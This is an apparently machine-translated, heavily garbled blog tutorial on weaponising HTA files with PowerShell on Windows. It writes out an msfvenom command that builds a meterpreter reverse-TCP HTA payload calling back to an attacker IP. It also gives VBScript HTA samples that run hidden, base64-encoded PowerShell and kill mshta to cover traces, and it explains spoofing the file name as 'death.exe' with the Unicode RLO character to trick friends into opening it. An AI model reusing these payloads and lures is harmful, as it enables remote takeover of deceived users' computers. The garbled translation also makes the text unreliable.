我々はすべて知っているように、PowerShellは長いWindows環境に統合された、国内の円がめったにPowerShellで議論していない聞くながら、すべての楽しみを持つ大規模な外国人の牛は、HTA言及はなく、コンピュータサイエンスは、おそらくこれがあるかわかりませんどのような地獄
Linuxではそこbashのは、PowerShellはWindowsの下にあります。PowerShellは.NETは、この大きな木に依存しているので、また、直接呼び出しは、使用中の他の強力な機能と価値をWINDOWSAPIています。
PowerShellのスクリプトの接尾辞PS1などバット、VBS、exeファイルとは異なり、この形式をダブルクリックし、実行、しかしたpowershell.exeで開始する必要がありますが、直接使用することができます。
たpowershell.exe -ExecutionPolicyバイパス-ファイル。\ script.ps1
win7のとserver08後、PowerShellは、システム内の彼の多くのことを聞かせするための強力な危険を介して管理サーバ、同じことを容易に移動し、統合されています。
HTA
HTA形式は、奇妙な接尾辞をようだが、あなたが毎日にさらされている実際の移動ネットワークは、ことも可能であるウェブページの形式、HTML / HTM HTML構文を介してコンテンツを書くに似ているため。
HTAは、HTML-アプリケーションの頭字語であるソフトウェア開発における新しい概念であり、直接アプリケーションソフトから独立した形式にHTA HTMLページを保存し、ページの内容を開くに違いはありません、VB、C ++やその他の手続とのインターフェイスソフトウェアインターフェイスの設計言語は、ウィンドウのインターフェイスとして表示、違いはありません。
関連コンテンツ:HTA_ Baiduの百科事典
Webページがあります!ないその釣りの事!あなたは、教えるために?
あなたは本当に釣りのように、それを得たが、CSSで記述されたものの、追加する必要がありますし、HTMLとJS HTA ,,通常のウェブページよりもはるかに大きい権限、他のソフトウェアとだけでなく、同じウィンドウインターフェイス、それはまた、VBに対応する類似していC ++デスクトップアプリケーション(読み取りと書き込みのファイル、レジストリ操作など)で書かれた同じ権利。HTAはもともと私たちが直接他のコンポーネントを呼び出すコマンドを実行することができ、デスクトップアプリケーションの生産のために設計されました。
一般的にはちょっとちょっと...... PowerShellを結合した場合HTAは、Webアプリケーションのexeファイルのマントを着ているに言えば、
Githubの曹操に使用するためのPowerShellスクリプトは、曲がったナットはすでに非常に徹底した調査され、浸透スクリプトを学ぶことができ、多くの大規模な牛があります。
ダガーはマコンを隠し、笑っていない、私は動きを作りたいです
最初の栗の場合:hello.hta(栗有毒ではない、コピーして食べても安全ペースト〜)
<! - hello.hta - > < HTML > < ヘッド> < タイトル>こんにちは</ タイトル> < メタHTTP-当量= "Content-Typeの" コンテンツ= "text / htmlの;のcharset = UTF-8" /> < HTA:APPLICATIONID = "太田" のapplicationName = "hta_app" 国境= "薄い" のBorderStyle = "ノーマル" のアイコン= "hello.ico" maximizebutton = "yes"をminimizebutton = "はい"showintaskbar = "no"をsingleinstance = "なし"SYSMENU = "yes"をバージョン= "777" のWindowState = "ノーマル" スクロール= "yes"を> </ ヘッド> < 身体> < センター> < BR > < H1 >こんにちはHTA </ H1 > < BR > < H2 >( ⊙O⊙)/出来吧!计算器!</ H2 > < BR > </ センター> < スクリプト言語=」VBScriptの」 > を設定こんにちは= のCreateObject (" Wscript.Shell " ) Hello.Run " CALC.EXE " </ スクリプト> </ ボディ> </ HTML >
ページが静的であるが、vbsファイルHTAスクリプトを直接使用してWscript.Shellを呼び出すことができますがように、彼はダブルクリック「HTAの実装として考えるならば、結局のところ、人々は、ビッグブラザー、スクリプトの一部のアプリケーション指向タイプのHTML家ですマレーシアは「あまりありません!あなたはその環境がポップアップ表示されませんどのような勝利に統合されており、入力されているでしょうmshta(Windowsの環境、CMD-HTAを内蔵し、入力して、ちょうどこの事を証明するためにOKを与えられていないので、はっきり、HTAの実行のexeファイルを実行しますちょうどインスタンスであなたダブルクリックすることができます)のように、<HTA:> hello.hta。関連コンテンツへのリンクを参照して、詳細を設定する前にHTA、HTAを設定するパラメータの一部です。
暴力PowerShellのそれの出力に接続された場合HTAはすでに、完璧なアシストを持っていますか?
答えは:あなたがそれを選ぶ、私は3組の道路の崩壊を再生するために来ました。
PS:単純にGithubの人々に注入されたシェルコードスクリプトを描き、多くの間違った子を書き、HTAの古い長いコールPowerShellを書くシェルコードを生成するために、オープンMatesploitの準備ができて、書き込み、突然地方、元はmsfvenomにHTA-PSH準備フォーマットを持っていることがわかりました時間と努力が、それは良いの使用になります。(私は......それを前に気づかなかった、世話をします)
さて、私たちに直接HTA-PSHリバウンドスクリプトに:
msfvenom -p窓/ meterpreter / reverse_tcp lhost = 175.xxx.xxx.xxx lportは= 8081 -f HTA-PSH -o test.hta
(スクリプトは、学生が勉強したい、base64encodeの暗号化を介してコンテンツを生成文法の準備を観察し、部分的に還元BASE64することができます。)
直接meterpreter_shellを再生する(ウイルス対策のすべての種類、セキュリティ犬、ビッグブラザー型のテスト環境)、友人に試してみてください、5-6秒の間隔からリバウンドする]をクリックし、処理時間ので(第2 PowerShellとbase64で見積もりを呼び出します回は一見)少し速くそれを開く]をポイントして、全体のプロセスにも、本当に思い出させないでください、ウイルスをトリガしません「を食べる準備ができてのオープン袋を。」
分析:
1. HTAはmshta.exe解像度に依存し、システムがmshta.exeで付属していますので、中断またはVBSスクリプトの空想のように殴られることはありません、実行するために直接呼び出して殺害を避けることができませんでした。
2. PowerShellのまあ、共感が自国民のウィンドウで、隠された-w -nopパラメータを追加した後、UACは、コマンドを実行するために強制的にバイパスすることができます。
その上、など80/443/21/22/25/445/1433/3306/3389/8080/8888とし、いくつかのアンチウイルス傍受共通httpポートがあるためで占有することなく、8081も要因であるポートを選択しますそれは使用することができます。
開封後は行きますので、まれ形式?どのように使用するには?
A:私がやります!I!私のために投票!私のために投票!:P
確かに、HTAファイルのサフィックスは、ホワイトボードディスプレイを開き、アイコンまたは実行ファイルを、それを見たことがない、非常に疑わしい......!スパイシータッチ......それは援軍が辛い送らサル次第です。この時間!
だから、質問は、あなたが知っているUnicodeの制御文字、それを......
Unicode文字コントロール:コントロールのテキスト表示属性は、同様の反転表示属性の設定を実現しています。そして、この機能は、同じファイル名に適用されます!〜あなたのコング(素朴な)明(小口)少しのインスピレーションと社会的な魅力と組み合わせると、シェルをプレイ毎分は夢ではない、私たちは制御文字に彼の名前の変更、そして豊かな装飾を挙げてみましょう
さあ、別の栗を与える:deexe.hta
< タイトル> XXX-EXP </ タイトル> < センター> < H1 > XXX-EXP:death.exe </ H1 > < BR > < H2 > ...と</ H2 > < BR > [ < マーキーscrollAmount = 4 幅= 350 方向=右> ||||||||||||| </ マーキー> ] 35% < BR > </ センター> スクリプト言語= "VBScriptの" > を設定Hackdo = のCreateObject (" Wscript.Shell " ) を設定チェック= のCreateObject (" Scripting.FileSystemObjectオブジェクト" ) の場合Check.FileExists(Hackdo.ExpandEnvironmentStrings(" %のPSModulePathの%" )+ " .. \ PowerShellの.EXE " )すると Hackdo.Run " CALC.EXE隠されたpowershell.exe -nop -w " 終了 した場合 </ スクリプト>
そのような絵があり、そうではありません - 人々は数秒を停止するように反応します!スプレーしないでください、私たちは確かに私よりももっと良い知っている_(:зゝ∠)_
ちょうど1つのPowerShellコマンドを置き換えます。
pwershell.exe -nop -w隠し-e ... base64でPS1-ペイロードbalabalabala ...
あなたはどう思うかによると、あなたのコマンドを実行することができるようになります!
ソーシャルワーカーは、造園は、ブレインストーミングをすることができますhtmlの接尾辞として保存された制御文字の使用は、インタフェースは、黒のページで置き換えられていても、完璧な画像エフェクトを作成します。
「新しいアメリカは、あなたの外観を送信しない友人に黒のページを作りました。」 - 人々を、また、すべての合理的なイベントの感情的な脆弱性。
(理論的には<HTA:>により、テストが成功しなかった理由をラベルのアイコンを制御する、私は知りません。)
スクリプトの最後で、効果をフラッシュバックするふりをしたい場合は、直接シェルコードは、PowerShellの実行を注入されているため、限りPowerShellの生きている、セッションを開催することができますように、mshtaプロセスを殺す「taskkill / F / IM mshta.exe」を実行する追加することができます。
< スクリプト言語= "VBScriptの" > を設定Hackdo = のCreateObject (" Wscript.Shell " ) を設定チェック= のCreateObject (" Scripting.FileSystemObjectオブジェクト" ) の場合Check.FileExists(Hackdo.ExpandEnvironmentStrings(" %のPSModulePathの%" )+ " .. \たpowershell.exe " )すると Hackdo.Run " たpowershell.exe -nop -w隠されたCALC.EXE " Hackdo.Run "taskkill / F / IM mshta.exe " 終了 した場合 </ スクリプト>
PS:実際の浸透、セッションを取得した後すぐに覚え移行[別の-pidを]ああ
それは、彼らが新しいTXTドキュメント、開いて、ペーストを作成し、名前deexe.htaとして保存し、再度コピーを実際の動作を下にコピーすることができますちょうど爆弾電卓スクリプトですが、名前を変更する権利は、デとexe.htaの間でカーソルを右クリックし、 Unicodeの挿入制御文字を選択し、RLOを挿入します。
Walaaa〜おめでとう、新しい名前death.exeを取得します!実行msf_reverseに置き換えられ、すぐに核実験火力新規作成のベースフレンズを発行!
シーンシミュレーション:
「私はエクスプロイトの危険、XXX-サーバが直接秒書いた!あなたがプレイする前に?」
「Haoyahaoya!えっ?えっを読んでい......?バックフラッシュ......」
「あなたはそれを削除!バグがあります!私は変更するように変更したいと思います......」
(1 ... 2 ... 3 ...跳ねる爆弾、戦争の痛み!
引用文